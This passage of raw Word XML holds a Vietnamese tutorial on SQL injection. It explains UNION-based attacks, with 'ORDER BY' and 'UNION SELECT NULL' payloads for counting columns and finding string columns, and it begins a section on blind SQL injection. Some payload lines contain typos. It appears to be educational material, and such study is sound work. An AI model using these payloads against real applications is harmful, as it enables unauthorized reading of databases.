            <wp:extent cx="5731510" cy="3223974"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="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974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB8CDE" w14:textId="77777777" w:rsidR="00995332" w:rsidRDefault="001D0AEE" w:rsidP="00995332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Như vậy ta đã lấy được dữ liệu “Blad3”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19558A" w14:textId="65983876" w:rsidR="00995332" w:rsidRPr="00152695" w:rsidRDefault="00995332" w:rsidP="00152695">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc42895599"/>
      <w:r w:rsidRPr="00152695">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.UNION-based SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="13D285E7" w14:textId="70CC3849" w:rsidR="001A2EB8" w:rsidRPr="00150873" w:rsidRDefault="001A2EB8" w:rsidP="00150873">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc42895600"/>
      <w:r w:rsidRPr="00150873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="00AE6725" w:rsidRPr="00150873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00150873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Xác định số lượng cột cần thiết trong cuộc tấn công UNION SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0E67B940" w14:textId="4E1FB874" w:rsidR="001A2EB8" w:rsidRDefault="001A2EB8" w:rsidP="001A2EB8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Khi thực hiện cuộc tấn công UNION SQLi, có hai phương pháp hiệu quả để xác định số lượng cột sẽ trả về từ truy vấn gốc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3A86EB" w14:textId="110147DE" w:rsidR="001A2EB8" w:rsidRDefault="001A2EB8" w:rsidP="001A2EB8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Phương pháp đầu tiên liên quan đến tiêm một loạt các câu lệnh “ORDER” và tăng chỉ số cột đến khi xảy ra lỗi. Ví dụ, giả sử điểm tiêm là một chuỗi được trích dẫn trong mệnh đề WHERE của truy vấn ban đầu, bạn sẽ gửi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C56C7D4" w14:textId="77777777" w:rsidR="001A2EB8" w:rsidRDefault="001A2EB8" w:rsidP="001A2EB8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>ORDER BY 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CDD6B" w14:textId="77777777" w:rsidR="001A2EB8" w:rsidRDefault="001A2EB8" w:rsidP="001A2EB8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>ORDER BY 2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72071DB2" w14:textId="77777777" w:rsidR="001A2EB8" w:rsidRDefault="001A2EB8" w:rsidP="001A2EB8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>ORDER BY 3—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B2EFA" w14:textId="77777777" w:rsidR="001A2EB8" w:rsidRDefault="001A2EB8" w:rsidP="001A2EB8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615E34B" w14:textId="1FE4C6BA" w:rsidR="001A2EB8" w:rsidRDefault="001A2EB8" w:rsidP="001A2EB8">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  Đây là một loạt các sửa đổi trong truy vấn ban đầu để sắp xếp các kết quả theo các cột khác nhau trong tập kết quả. Cột trong mệnh đề ORDER BY có thể được chỉ định bởi chỉ mục của nó, nên bạn không cần phải biết tên của các cột đó. Khi chỉ mục cột vượt quá số lượng cột thực tế trong tập kết quả, cơ sở dữ liệu sẽ trả về lỗi, ví dụ như: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C69D5" w14:textId="42C6F760" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="001A2EB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00042D84">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The ORDER BY position number 3 is out of range of the number of items in the select list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4C4CF" w14:textId="77777777" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="00940DC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Ứng dụng thực sự có thể trả về lỗi cơ sở dữ liệu trong phản hồi HTTP, hoặc nó chỉ trả về lỗi chung hoặc đơn giản là không trả về kết quả. Với điều kiện bạn có thể phát hiện một số khác biệt trong phản hổi của ứng dụng, bạn có thể suy ra có bao nhiêu cột được trả về từ truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E29A01" w14:textId="783ACAA3" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="00940DC1">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Phương pháp thứ 2: liên quan đến việc gửi một loạt các các dữ liệu “UNION SELECT” chỉ một số lượng giá trị NULL khác nhau, ví dụ :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D02A202" w14:textId="77777777" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="00940DC1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT NULL- - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390DDBED" w14:textId="77777777" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="00940DC1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT NULL, NULl- - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BAEB96" w14:textId="77777777" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="00940DC1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>UNION SELCT NULL, NULL, NULL- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ECC731" w14:textId="01BBA151" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="00940DC1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16285FBE" w14:textId="5F18A805" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="003D20F9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Nếu số lượng NULL không khớp với số lượng cột,, cơ sở dữ liệu sẻ trả về lỗi, ví dụ như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FDF245" w14:textId="77777777" w:rsidR="003D20F9" w:rsidRPr="003D20F9" w:rsidRDefault="003D20F9" w:rsidP="003D20F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003D20F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A6E8B" w14:textId="77777777" w:rsidR="003D20F9" w:rsidRDefault="003D20F9" w:rsidP="003D20F9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Một lần nữa, ứng dụng thực sự có thể trả vể thông báo lỗi nàu hoặc chỉ trả về thông báo lỗi chung hoặc không có kết quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AECB415" w14:textId="1BBAEF18" w:rsidR="003D20F9" w:rsidRPr="00150873" w:rsidRDefault="009E752C" w:rsidP="000A00E5">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A16AD">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_Toc42895601"/>
      <w:r w:rsidRPr="00150873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2. </w:t>
      </w:r>
      <w:r w:rsidR="003D20F9" w:rsidRPr="00150873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tìm các cột có thông tin hữu ích trong tấn công UNION SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="35C548B8" w14:textId="7182C39E" w:rsidR="003D20F9" w:rsidRDefault="009E752C" w:rsidP="00C31749">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00C31749">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31749">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="003D20F9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lý do để thực hiện một cuộc tấn công UNION SQLi  là có thể lấy được kết quả từ một truy vấn được chèn. Nói chung, dữ liệu mà bạn muốn truy xuất  sẽ ở dạng chuỗi, vì vậy bạn cần tìm một hoặc nhiều cột trong kết quả truy vấn ban đầu có loại dữ liệu hoặc tương thích với dữ liệu đầu chuỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C83926F" w14:textId="7079A388" w:rsidR="003D20F9" w:rsidRDefault="00326E4F" w:rsidP="00326E4F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="003D20F9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Khi đã xác định số lượng cột cần thiết, bạn có thể thăm dò từng cột để kểm tra xem nó có dữ liệu chuỗi hay không bằng cách gửi một loạt các câu lệnh UNION SELECT  đặt lần lượt một giá trị chuỗi vào từng cột.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E959321" w14:textId="77777777" w:rsidR="003D20F9" w:rsidRDefault="003D20F9" w:rsidP="00C31749">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ví dụ: nếu truy vấn trả về 4 cột, bạn có thể gửi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A148F" w14:textId="77777777" w:rsidR="003D20F9" w:rsidRPr="00C31749" w:rsidRDefault="003D20F9" w:rsidP="00C31749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31749">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UNION SELECT  ‘a’, NULL, NULL, NULL - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3374F0" w14:textId="77777777" w:rsidR="003D20F9" w:rsidRPr="00C31749" w:rsidRDefault="003D20F9" w:rsidP="00C31749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31749">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UNION SELECT   NULL, ‘a’, NULL, NULL - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719DD80" w14:textId="77777777" w:rsidR="003D20F9" w:rsidRPr="00C31749" w:rsidRDefault="003D20F9" w:rsidP="00C31749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31749">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UNION SELECT  ‘NULL, NULL, ’a’, NULL - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA2297E" w14:textId="0C98B54A" w:rsidR="00C31749" w:rsidRDefault="00C31749" w:rsidP="00C31749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31749">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UNION SELECT  NULL, NULL, NULL, ‘a’ - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4D1C30" w14:textId="058381FC" w:rsidR="00C31749" w:rsidRPr="00326E4F" w:rsidRDefault="00326E4F" w:rsidP="00326E4F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31749" w:rsidRPr="00326E4F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu kiểu dữ liệu của một cột không tương thích với dữ liệu chuỗi, truy vấn được chèn sẽ gây ra lỗi cơ sở dữ liệu, ví dụ như: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F3A0C" w14:textId="77777777" w:rsidR="00C31749" w:rsidRPr="00326E4F" w:rsidRDefault="00C31749" w:rsidP="00326E4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326E4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Conversion failed when converting the varchar value 'a' to data type int.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A2CBAD" w14:textId="77777777" w:rsidR="00C31749" w:rsidRPr="00326E4F" w:rsidRDefault="00C31749" w:rsidP="00326E4F">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326E4F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nếu xảy ra lỗi và phản hồi của ứng dụng chưa một số nội dung bổ sung bao gồm giá trị chuỗi được chèn, thì cột có liên quan phù hợp để truy xuất dữ liệu chuỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F84FD" w14:textId="77777777" w:rsidR="00C31749" w:rsidRPr="00C31749" w:rsidRDefault="00C31749" w:rsidP="00C31749">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA25347" w14:textId="256EB4A9" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="00C31749"/>
    <w:p w14:paraId="660CF8E9" w14:textId="2061B8A4" w:rsidR="00940DC1" w:rsidRDefault="00940DC1" w:rsidP="00940DC1"/>
    <w:p w14:paraId="79E97A9E" w14:textId="50BD901C" w:rsidR="00721411" w:rsidRDefault="00721411"/>
    <w:p w14:paraId="059333C3" w14:textId="7B3585D2" w:rsidR="00721411" w:rsidRDefault="00721411"/>
    <w:p w14:paraId="4F5BBC27" w14:textId="0D4E0F8B" w:rsidR="00721411" w:rsidRDefault="00721411"/>
    <w:p w14:paraId="06B70624" w14:textId="367340DC" w:rsidR="00721411" w:rsidRDefault="00721411"/>
    <w:p w14:paraId="7E8C1115" w14:textId="5E7858AD" w:rsidR="00721411" w:rsidRDefault="00721411"/>
    <w:p w14:paraId="49EEBD0A" w14:textId="66D6FA74" w:rsidR="00721411" w:rsidRDefault="00721411"/>
    <w:p w14:paraId="60531B77" w14:textId="5DC9C0A0" w:rsidR="00721411" w:rsidRDefault="00721411"/>
    <w:p w14:paraId="1FEFB41C" w14:textId="49DD64EC" w:rsidR="00D57663" w:rsidRDefault="00D57663"/>
    <w:p w14:paraId="4D7587E7" w14:textId="30EB7E6A" w:rsidR="00D57663" w:rsidRDefault="00D57663"/>
    <w:p w14:paraId="678A2DA0" w14:textId="1CB89AD5" w:rsidR="00D57663" w:rsidRDefault="00D57663"/>
    <w:p w14:paraId="758A8385" w14:textId="21A3AD04" w:rsidR="00FC5CBE" w:rsidRDefault="00DF1EFE" w:rsidP="005B1E98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc42895602"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2.Blind SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3901C27A" w14:textId="138E878F" w:rsidR="005B1E98" w:rsidRPr="005B1E98" w:rsidRDefault="005B1E98" w:rsidP="005B1E98">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="_Toc42895603"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2.1. Giới thiệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1DE48398" w14:textId="028F489A" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00266478">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00266478">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5CBE">
        <w:t>Blind SQLi là một dạng tấn công của SQLi, nó tương tự với kiểu classic(Error-based) ngoại trừ việc hacker cố gắng khai thác ứng dụng hơn là việc có được những lỗi trả về từ hệ thống.Ở dạng này các hacker lấy dữ liệu bằng cách hỏi hệ thống một loạt các câu hỏi dạng TRUE/FALSE thông qua việc truyền vào các câu lệnh SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6871D0AC" w14:textId="77777777" w:rsidR="00266478" w:rsidRDefault="00266478" w:rsidP="00266478">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
        <w:t xml:space="preserve">Dạng này lại được phân chia thành 2 dạng chính:    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6299185C" w14:textId="0664EA01" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00266478">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00266478">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26487FD4" w14:textId="253CF06C" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00266478">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5CBE">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC5CBE">
        <w:tab/>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00266478">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00266478">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CABE7" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00266478">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3B861F" w14:textId="3D0B7846" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="003D1F1A" w:rsidP="00266478">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Ở</w:t>
      </w:r>
      <w:r w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE">
        <w:t xml:space="preserve"> dạng tấn công Blind người tấn công sẽ không quan sát được thông tin phản hồi từ ứng dụng khi truyền vào các lệnh SQL mà phải liệt kê các khả năng có thể của cơ sở dữ liệu, các bảng,... thông qua một loạt các phép thử và được lặp đi lặp lại, từ đó có được dữ liệu cần thiết qua đó xây dựng lại được CSDL, lấy được các thông tin nhạy cảm,...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42953EDC" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRPr="00FC5CBE" w:rsidRDefault="00FC5CBE" w:rsidP="00FC5CBE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72995177" w14:textId="7972ED9F" w:rsidR="00FC5CBE" w:rsidRPr="003D1F1A" w:rsidRDefault="003D1F1A" w:rsidP="003D1F1A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc42895604"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2.2.Cơ chế hoạt động</w:t>
